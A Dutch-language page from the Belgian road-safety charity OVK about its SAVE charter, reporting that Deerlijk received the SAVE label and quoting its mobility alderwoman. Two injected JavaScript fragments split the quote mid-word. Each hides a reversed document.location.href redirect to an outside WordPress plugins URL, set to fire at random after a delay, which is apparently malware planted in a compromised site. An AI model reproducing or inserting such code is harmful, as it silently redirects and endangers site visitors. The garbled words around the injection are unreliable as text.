Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Deerlijk ontvangt het SAVE-label

Op 15 april ontving Deerlijk als 9e Vlaamse en als 2e West-Vlaamse gemeente het SAVE-label.

In de woorden van schepen van mobiliteit Ann Accou hun verwezelijkingen:

“Wij zorgden onder meer voor een veiligheidsanalyse, werkten aan schoolroutekaarten, zetten in op snelheidscontroles (en in de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst ook op alcoholcontroles), sensibiliseren de nieuwe inwoners en werken mee rond de opvang van verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers en hun naasten.”

De schepen liet ook onmiddelijk verstaan dat dit label voor Deerlijk geen eindpunt is maar ook een startsein om werk te maken van een nieuw SAVE-actieplan.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be